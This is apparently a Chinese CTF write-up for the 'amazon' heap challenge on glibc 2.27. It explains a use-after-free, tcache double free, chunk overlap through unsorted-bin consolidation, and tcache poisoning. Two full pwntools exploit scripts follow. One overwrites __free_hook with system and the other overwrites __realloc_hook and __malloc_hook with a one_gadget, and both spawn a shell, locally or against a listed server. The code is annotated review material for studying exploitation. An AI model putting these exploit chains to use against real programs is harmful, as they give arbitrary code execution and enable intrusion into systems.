数字安全 amazon

amazon

这道题有一个 UAF:从 exp 看,checkout 释放 chunk 后并不会清空对应的指针,同一项可以被反复 free,free 之后仍然可以通过 show 读出其中的内容。
但是申请到的 chunk 的前 0x20 字节被程序用来放置固定内容,用户可控的 note 并不从 chunk 开头写入,因此无法直接改写 tcache 的 next 指针;要利用 tcache attack 就需要先构造 chunk overlap。

利用方法

  1. 利用 UAF 反复 free 同一个 chunk(目标 libc 为 2.27,tcache 没有 double free 检查):chunk 大小要选在 fastbin 范围之外,这样前 7 次 free 进入 tcache,tcache 填满后第 8 次进入 unsortedbin。对三个相邻的 chunk 依次这样操作(先两边、后中间),利用 unsortedbin 中的空闲 chunk 会与前后相邻空闲 chunk 合并的特点,得到一个覆盖这三个 chunk 的大 chunk,从而构造出 overlap。
  2. 因为申请 chunk 的大小可控,所以可以从 unsortedbin 中的大 chunk 里切出一个较大的 chunk,覆盖到后面仍在 tcache 中的 chunk 的头部,改写其 size 和 next(fd)指针,实现 tcache poisoning:让 next 指向 __free_hook 或 __malloc_hook 附近,随后再申请两次同样大小的 chunk 就能拿到该地址。
  3. 由于 note 的前 0x20 字节不可控,劫持 __free_hook 时要把 chunk 申请到 __free_hook 之前(更低地址,即 __free_hook-0x40),用 0x20 个 \x00 把中间的 _IO_stdfile lock 清零(锁为 0 后续的 I/O 才能正常进行),再把 __free_hook 覆盖为 system,最后 free 一个开头为 "/bin/sh\0" 的 chunk 即可。或者把 chunk 申请到 __malloc_hook-0x28,将 __realloc_hook 覆盖为 one_gadget、__malloc_hook 覆盖为 __libc_realloc+8:从 realloc 开头跳过若干条 push 指令进入,借此调整栈布局(即所谓"栈不平衡"),使 one_gadget 的约束得以满足,之后任意一次 malloc 都会触发 hook 并得到 shell。

__free_hook

EXP

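#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
# NOTE(review): in the published listing the shebang, the coding cookie and the
# import were fused onto a single line, which made ``from pwn import *`` part of
# the comment (NameError on ``context`` below). Restored as separate lines.
from pwn import *

context.log_level = "debug"   # full I/O trace; noisy, but handy while debugging heap state
context.arch = "amd64"        # target is x86-64

exe = './amazon'
elf = ELF(exe)

# Gadget offsets for the challenge's libc build (the remote branch of __main__
# loads libc-2.27.so). Not referenced by this script's pwn(); kept for parity
# with the __malloc_hook variant. Re-derive them if the local libc differs.
one = [0x4f2c5, 0x4f322, 0x10a38c]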

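#------------------------------------
# NOTE(review): the separator comment and the ``def`` line were fused in the
# published listing, which commented out the definition and left the body as
# an unexpected indent. Restored as two lines.
def d(s = ''):
        """Attach gdb to the target, optionally running the gdb script ``s`` first.

        Debug helper only: it expects ``p`` (module global set in __main__) to be a
        local process(); it is not meaningful for the remote() tube.
        """
        gdb.attach(p ,s)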

def manu(idx):
        """Pick menu option ``idx``: wait for the ``choice: `` prompt, then send the number."""
        choice = str(idx)
        p.sendlineafter('choice: ', choice)

def add(num, size, note):
        """Menu option 1: buy product 1 with quantity ``num`` and a ``size``-byte note.

        Every numeric answer is sent only after its prompt has been seen. The note
        body itself is sent raw (no trailing newline).
        """
        manu(1)
        p.sendlineafter('buy: ', str(1))
        prompted = (('many: ', num), ('note: ', size))
        for prompt, value in prompted:
                p.sendlineafter(prompt, str(value))
        p.send(note)


def add1(num, size, note):
        """Blind variant of add(): same menu path, but no prompt synchronisation.

        After the product selection, quantity, size and note are each written with
        sendline() without waiting for the corresponding prompt, and the note is
        newline-terminated (add() sends it raw). Not used by pwn().
        """
        manu(1)
        p.sendlineafter('buy: ', str(1))
        for field in (num, size):
                p.sendline(str(field))
        p.sendline(note)

def show():
        """Menu option 2: list the cart. pwn() reads the libc leak from this output."""
        option = 2
        manu(option)

def checkout(idx):
        """Menu option 3: check out (free) entry ``idx``.

        Per the write-up the entry stays usable afterwards (UAF), which is why
        pwn() calls this repeatedly on the same index.
        """
        manu(3)
        which = str(idx)
        p.sendlineafter('for: ', which)

def pwn():
        """Exploit ./amazon (glibc 2.27 tcache) ending in __free_hook = system.

        Relies on the program's UAF: checkout(i) frees entry i but the entry stays
        usable, so it can be freed repeatedly and read back with show(). Strategy
        (see the write-up above): fill tcache bins by double free, push three
        adjacent chunks into the unsorted bin so they consolidate, carve an
        oversized note out of the merged region to rewrite a cached chunk's header
        and tcache next pointer (tcache poisoning), then allocate just below
        __free_hook. Uses the module globals ``p`` and ``libc`` set in __main__.
        """
        # Four adjacent entries; the second argument is the requested note size.
        add(2, 0x80, 'a')  #0
        add(2, 0xa0, 'A')  #1
        add(2, 0x90, 'A')  #2
        add(2, 0x10, 'A')  #3 (the original listing labelled this #4)
        # Free entry 0 eight times: 2.27 tcache has no double-free check, so the
        # first seven frees fill its tcache bin and the eighth leaves tcache and,
        # per the write-up, lands in the unsorted bin.
        for i in range(8):
                checkout(0)

        # Same for entry 2, the chunk on the other side of entry 1.
        for i in range(8):
                checkout(2)

        # Entry 0 is in the unsorted bin, so its fd points into main_arena and
        # show() prints it where the name used to be. 0x3ebca0 is the leak-to-
        # libc-base offset for the libc build this exploit targets; it must be
        # re-derived for any other build (the local libc may not match).
        show()
        p.recvuntil('Name: ')
        libc.address = u64(p.recv(6).ljust(8, '\x00')) - 0x3ebca0
        success('libc.address--->'+hex(libc.address))
        # Entry 1 now sits between two free chunks; its eighth free reaches the
        # unsorted bin and consolidates with both neighbours into one large chunk.
        for i in range(8):
                checkout(1)

        # Carve a 0x100-byte note from the merged chunk. The note overlaps the
        # header of a chunk still sitting in the 0xa0 tcache bin: fake prev_size,
        # size 0xa1, and a tcache next pointer 0x40 below __free_hook (0x20 bytes
        # of program-owned content plus the 0x20 zero bytes written further down
        # sit before the hook itself).
        add(2, 0x100, '\xff'*0x80 +p64(3)+p64(0xa1) + p64(libc.sym['__free_hook']-0x40))
        # Release entry 0 again so the overlapping region can be re-requested below.
        checkout(0)
        # First 0xa0 request pops the poisoned chunk (the entry checkout(5) frees
        # at the end); __free_hook-0x40 is now the head of that tcache bin.
        add(2, 0xa0, 'a')
        # Re-take the overlapping note to plant "/bin/sh\0" at the start of that
        # entry's buffer -- presumably the pointer free() will later receive.
        add(2, 0x100, '\xff'*0x80 +p64(3)+p64(0xa1) + '/bin/sh\x00')
        # Second 0xa0 request returns __free_hook-0x40. Per the write-up the 0x20
        # zero bytes clear the _IO_stdfile lock just below the hook (a non-zero
        # lock would stall later stdio), and the final qword is __free_hook = system.
        add(2, 0xa0, '\x00'*0x20+p64(libc.sym['system']))
        # NOTE(review): debugger attach left in from development; it blocks until
        # gdb is up and is meaningless against the remote target. Remove before
        # running for real.
        d()
        # free(entry 5) -> __free_hook("/bin/sh") -> system("/bin/sh").
        checkout(5)
        
        p.interactive()
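#-------------------------------------
# NOTE(review): the separator comment and the ``if __name__`` line were fused in
# the published listing, which commented out the guard and made the script fail
# to parse (unexpected indent). Restored as two lines.
if __name__ == '__main__':
        # Local/remote toggle: 1 = spawn ./amazon and use the system libc,
        # 0 = connect to the challenge server and use the shipped libc-2.27.
        # NOTE(review): the constants in pwn() (0x3ebca0 libc offset) belong to the
        # libc-2.27 build; a local run is only meaningful if the system libc is the
        # same build. pwn() also attaches gdb via d(), so as written only the local
        # branch is runnable.
        l = 1
        if l:
                p = process(exe)
                libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        else:
                p = remote('121.41.38.38', 9999)
                libc = ELF('libc-2.27.so')

        pwn()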

__libc_realloc + __malloc_hook

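#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
# NOTE(review): in the published listing the shebang, the coding cookie and the
# import were fused onto a single line, which made ``from pwn import *`` part of
# the comment (NameError on ``context`` below). Restored as separate lines.
from pwn import *

context.log_level = "debug"   # full I/O trace; noisy, but handy while debugging heap state
context.arch = "amd64"        # target is x86-64

exe = './amazon'
elf = ELF(exe)

# Gadget offsets for the challenge's libc build (the remote branch of __main__
# loads libc-2.27.so); pwn() writes libc.address + one[2] into __realloc_hook.
# Re-derive them if the local libc is a different build.
one = [0x4f2c5, 0x4f322, 0x10a38c]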

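#------------------------------------
# NOTE(review): the separator comment and the ``def`` line were fused in the
# published listing, which commented out the definition and left the body as
# an unexpected indent. Restored as two lines.
def d(s = ''):
        """Attach gdb to the target, optionally running the gdb script ``s`` first.

        Debug helper only: it expects ``p`` (module global set in __main__) to be a
        local process(); it is not meaningful for the remote() tube. Unused here.
        """
        gdb.attach(p ,s)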

def manu(idx):
        """Answer the ``choice: `` menu prompt with option ``idx``."""
        p.sendlineafter('choice: ', '%d' % int(idx) if isinstance(idx, int) else str(idx))

def add(num, size, note):
        """Menu option 1: buy product 1, quantity ``num``, with a ``size``-byte note.

        Waits for each prompt before answering; the note body is sent raw (no
        trailing newline).
        """
        manu(1)
        p.sendlineafter('buy: ', str(1))
        p.sendlineafter('many: ', str(num))
        note_len = str(size)
        p.sendlineafter('note: ', note_len)
        p.send(note)


def show():
        """Menu option 2: list the cart (pwn() takes the libc leak from this)."""
        option = 2
        manu(option)

def checkout(idx):
        """Menu option 3: check out (free) entry ``idx``.

        Per the write-up the freed entry remains usable (UAF), so pwn() calls this
        on the same index many times.
        """
        manu(3)
        which = str(idx)
        p.sendlineafter('for: ', which)

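def pwn():
        """Exploit ./amazon (glibc 2.27 tcache) via __realloc_hook / __malloc_hook.

        Same heap setup as the __free_hook variant (see the write-up above): double
        free into tcache until the chunks fall into the unsorted bin, consolidate
        three adjacent chunks, carve an oversized note out of the merged region to
        rewrite a cached chunk's header and tcache next pointer, then allocate on
        top of the malloc hooks. Uses the module globals ``p``, ``libc`` and ``one``.

        NOTE(review): the only code change versus the published listing is the
        final ``p.interactive()``, which was indented with 4 spaces inside an
        8-space body (IndentationError); it is now part of the function body.
        """
        # Four adjacent entries; the second argument is the requested note size.
        add(2, 0x80, 'a')  #0
        add(2, 0xa0, 'A')  #1
        add(2, 0x90, 'A')  #2
        add(2, 0x10, 'A')  #3 (the original listing labelled this #4)
        # Free entry 0 eight times: 2.27 tcache has no double-free check, so the
        # first seven frees fill its tcache bin and the eighth leaves tcache and,
        # per the write-up, lands in the unsorted bin.
        for i in range(8):
                checkout(0)

        # Same for entry 2, the chunk on the other side of entry 1.
        for i in range(8):
                checkout(2)

        # Entry 0 is in the unsorted bin, so its fd points into main_arena and
        # show() prints it where the name used to be. 0x3ebca0 is the leak-to-
        # libc-base offset for the libc build this exploit targets; it must be
        # re-derived for any other build (the local libc may not match).
        show()
        p.recvuntil('Name: ')
        libc.address = u64(p.recv(6).ljust(8, '\x00')) - 0x3ebca0
        success('libc.address--->'+hex(libc.address))
        # Entry 1 now sits between two free chunks; its eighth free reaches the
        # unsorted bin and consolidates with both neighbours into one large chunk.
        for i in range(8):
                checkout(1)

        # Carve a 0x100-byte note from the merged chunk. The note overlaps the
        # header of a chunk still sitting in the 0xa0 tcache bin: fake prev_size,
        # size 0xa1, and a tcache next pointer 0x28 below __malloc_hook.
        add(2, 0x100, '\xff'*0x80 +p64(3)+p64(0xa1) + p64(libc.sym['__malloc_hook']-0x28))
        # First 0xa0 request pops the poisoned chunk; __malloc_hook-0x28 is now the
        # head of that tcache bin.
        add(2, 0xa0, 'a')
        # Second 0xa0 request returns __malloc_hook-0x28. The program's 0x20 bytes
        # of fixed content come first, so the note starts at __malloc_hook-0x8:
        # __realloc_hook = one_gadget, __malloc_hook = __libc_realloc+8.
        add(2, 0xa0, p64(libc.address+one[2])+p64(libc.sym["__libc_realloc"]+8))

        # Trigger: the next malloc() runs __malloc_hook -> __libc_realloc+8 ->
        # __realloc_hook -> one_gadget. Entering realloc past its first push
        # instructions shifts the stack so the gadget's constraint holds (the
        # write-up's "stack imbalance"). The hook presumably fires before the note
        # prompt, which is why no note is sent here.
        manu(1)
        p.sendlineafter('buy: ', str(1))
        p.sendlineafter('many: ', '1')
        # NOTE(review): the size is sent as the literal text '0xa0', unlike add()
        # which sends str(size); harmless here because the hook fires on the
        # allocation regardless of the parsed value.
        p.sendlineafter('note: ', '0xa0')
        p.interactive()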
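#-------------------------------------
# NOTE(review): the separator comment and the ``if __name__`` line were fused in
# the published listing, which commented out the guard and made the script fail
# to parse (unexpected indent). Restored as two lines.
if __name__ == '__main__':
        # Local/remote toggle: 1 = spawn ./amazon and use the system libc,
        # 0 = connect to the challenge server and use the shipped libc-2.27.
        # NOTE(review): the constants in pwn() (0x3ebca0 libc offset, the ``one``
        # gadget list) belong to the libc-2.27 build; a local run is only
        # meaningful if the system libc is the same build.
        l = 1
        if l:
                p = process(exe)
                libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        else:
                p = remote('121.41.38.38', 9999)
                libc = ELF('libc-2.27.so')

        pwn()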